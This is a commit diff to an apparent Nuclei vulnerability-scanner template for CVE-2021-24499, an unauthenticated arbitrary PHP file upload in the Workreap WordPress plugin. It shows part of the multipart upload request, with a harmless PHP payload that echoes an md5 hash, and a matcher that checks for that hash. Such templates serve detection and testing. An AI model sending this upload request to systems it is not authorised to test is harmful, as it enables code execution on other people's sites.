Update CVE-2021-24499.yaml

cves/2021/CVE-2021-24499.yaml

@@ -5,8 +5,10 @@ info:
   author: daffainfo
   severity: critical
   description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
-  reference: https://github.com/RyouYoo/CVE-2021-24499
-  tags: cve,cve2021,wordpress,wp-plugin,rce
+  reference:
+    - https://github.com/RyouYoo/CVE-2021-24499
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24499
+  tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive
 
 requests:
   - raw:
@@ -24,7 +26,7 @@ requests:
         Content-Disposition: form-data; name="award_img"; filename="cve2021.php"
         Content-Type: application/x-httpd-php
 
-        <?php echo "CVE-2021-24499"; ?>
+        <?php echo md5("CVE-2021-24499"); ?>
         -----------------------------cd0dc6bdc00b1cf9--
 
       - |
@@ -40,9 +42,4 @@ requests:
       - type: word
         part: body
         words:
-          - "CVE-2021-24499"
-
-      - type: word
-        part: header
-        words:
-          - "text/plain"
+          - "71abe5077dae2754c36d731cc1534d4d"